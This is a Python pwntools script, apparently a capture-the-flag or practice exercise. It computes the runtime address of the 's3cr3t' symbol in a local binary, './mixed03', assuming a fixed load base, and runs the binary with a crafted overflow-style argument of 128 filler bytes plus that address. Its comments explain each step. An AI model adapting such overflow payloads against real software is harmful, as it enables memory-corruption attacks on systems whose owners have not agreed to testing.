from pwn import *
import subprocess

# Practice script for the local ./mixed03 binary: it builds one crafted
# command-line argument from the address of the `s3cr3t` symbol and then
# runs the binary with that argument.
context(
    arch='amd64',
    os='linux',
    log_level='info',
)

# Value of the `s3cr3t` symbol as recorded in the ELF file on disk.
target_elf = ELF('./mixed03')
symbol_value = target_elf.symbols['s3cr3t']

# Manual rebase: subtract 0x1000 and add the fixed constant 0x555555555000.
# NOTE(review): a hard-coded runtime address presumably only holds when the
# binary is loaded at a fixed base (ASLR disabled, e.g. under a debugger).
# With ASLR on a position-independent binary the base changes per run, so
# this value would not match -- confirm how the target is built and run.
runtime_addr = symbol_value - 0x1000 + 0x555555555000

# Little-endian 8-byte encoding of the address with the trailing zero bytes
# removed: a process argument cannot contain NUL bytes.
addr_bytes = p64(runtime_addr).rstrip(b'\x00')

# Argument layout: 128 '}' bytes, the address bytes, then one '{' byte.
# What ./mixed03 does with this layout and with the second argument '-2' is
# not visible in this script.
filler = b'}' * 128
arg = filler + addr_bytes + b'{'
print(arg)

# Arguments are passed as a list, so no shell is involved.
# The exit status of the child process is not checked.
subprocess.run(['./mixed03', arg, '-2'])